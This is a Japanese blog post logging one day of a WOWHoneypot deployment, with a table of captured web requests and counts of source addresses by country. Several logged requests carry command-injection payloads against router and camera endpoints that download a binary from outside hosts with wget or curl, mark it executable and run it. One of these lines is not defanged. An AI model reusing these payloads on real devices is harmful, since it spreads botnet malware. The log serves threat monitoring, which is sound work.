WOWHoneypot観察(147日目)
2019/08/10(土)
トータルは2062件でした。
ハンティングログは以下です。
| 211.193.211[.]96 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
| 192.34.128[.]70 wget+hxxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
| 165.22.51[.]24 wget hxxp[:]//23.254.204[.]46/cool; curl -O hxxp[:]//185.164.72[.]155/cool |
| 165.22.51[.]24 curl -O hxxp[:]//185.164.72[.]155/cool |
IPのロケーション別の件数は以下です。
| イタリア | 1825 |
| トルコ | 177 |
| アメリカ | 19 |
| ブラジル | 8 |
| 中国 | 6 |
| インド | 4 |
| チェコ | 2 |
| ドイツ | 2 |
| フランス | 2 |
| アルゼンチン | 2 |
| ルーマニア | 1 |
| ロシア | 1 |
| ハンガリー | 1 |
| イギリス | 1 |
| ギリシャ | 1 |
| イラン | 1 |
| アゼルバイジャン | 1 |
| エストニア | 1 |
| 韓国 | 1 |
| エクアドル | 1 |
| グルジア | 1 |
| ポーランド | 1 |
| タンザニア | 1 |
| マラウイ | 1 |
| オランダ | 1 |
| 件数 | 概要 | リクエスト |
|---|---|---|
| 1827 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
| 50 | アクセス | GET / |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.3/ |
| 4 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.2-rc1/ |
| 4 | phpMyAdminの調査 | GET /admin/ |
| 2 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
| 2 | 調査 | HEAD / |
| 2 | 不正中継の調査 | GET hxxp[:]//www[.]msftncsi[.]com/ncsi.txt |
| 2 | SQLiteの調査 | GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php |
| 2 | SQLiteの調査 | GET /sqlitemanager/main.php |
| 2 | SQLiteの調査 | GET /sqlite/main.php |
| 2 | SQLiteの調査 | GET /script |
| 2 | phpMyAdminの調査 | GET /pma/ |
| 2 | phpMyAdminの調査 | GET /phpmyadmin2/ |
| 2 | phpMyAdminの調査 | GET /phpmyadmin/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0.3/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0.2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0.1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0-rc2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0-rc1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0-beta1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-rc1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-pl2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-pl1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.7.0-beta1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-rc1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl4/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl3/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.4-pl1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.3-rc1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.3-pl1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.2-pl1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.2-beta1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-rc2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-rc1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-pl3/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-pl2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.1-pl1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-rc3/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-rc2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-rc1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-pl3/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-pl2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-pl1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-beta2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-beta1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-alpha2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.6.0-alpha/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.7/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.7-pl1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.6/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.6-rc2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.6-rc1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.5/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.5-rc2/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.5-rc1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.5-pl1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.4/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.5.1/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.2.6/ |
| 2 | phpMyAdminの調査 | GET /phpMyAdmin-2.2.3/ |
| 2 | phpMyAdminの調査 | GET /php-my-admin/ |
| 2 | phpMyAdminの調査 | GET /openserver/phpmyadmin/ |
| 2 | phpMyAdminの調査 | GET /mysql/ |
| 2 | phpMyAdminの調査 | GET /myadmin/ |
| 2 | phpMyAdminの調査 | GET /main.php |
| 2 | phpMyAdminの調査 | GET /hudson/script |
| 2 | phpMyAdminの調査 | GET /dbadmin/ |
| 2 | SQLiteの調査 | GET /agSearch/SQlite/main.php |
| 2 | SQLiteの調査 | GET /SQlite/main.php |
| 2 | SQLiteの調査 | GET /SQLiteManager/main.php |
| 2 | SQLiteの調査 | GET /SQLiteManager-1.2.4/main.php |
| 2 | SQLiteの調査 | GET /SQLite/main.php |
| 2 | phpMyAdminの調査 | GET /PMA/ |
| 2 | D-Linkルータの調査 | GET /HNAP1/ |
| 2 | cfgファイルの調査 | GET /64167f0000000.cfg |
| 1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
| 1 | クローリング | HEAD /robots.txt |
| 1 | 不正中継の調査 | GET hxxp[:]//110.249.212[.]46/testget?q=23333&port=80 |
| 1 | EyeLockの脆弱性を狙った通信? | GET /scripts/rpc.php?action=updatetime×erver=%7C%7Ccd%20/tmp;%20wget%20hxxp[:]//23.254.204[.]46/cool;%20curl%20-O%20hxxp[:]//23.254.204[.]46/cool;%20chmod%20+x%20cool;%20./cool%20HTTP/1.1 |
| 1 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.2/ |
| 1 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.1/ |
| 1 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.1-rc1/ |
| 1 | phpMyAdminの調査 | GET /phpMyAdmin-2.8.0.4/ |
| 1 | INCA IM-204の脆弱性を狙った通信 | GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang&cd%20/tmp;%20wget%20http://23.254.204.46/cool;%20curl%20-O%20http://185.164.72.155/cool;%20chmod%20+x%20cool;%20./cool |
| 1 | JBOSS管理コンソールの調査 | GET /admin-console/login.seam |
| 1 | AWS認証情報の調査 | GET /.aws/credentials |
にほんブログ村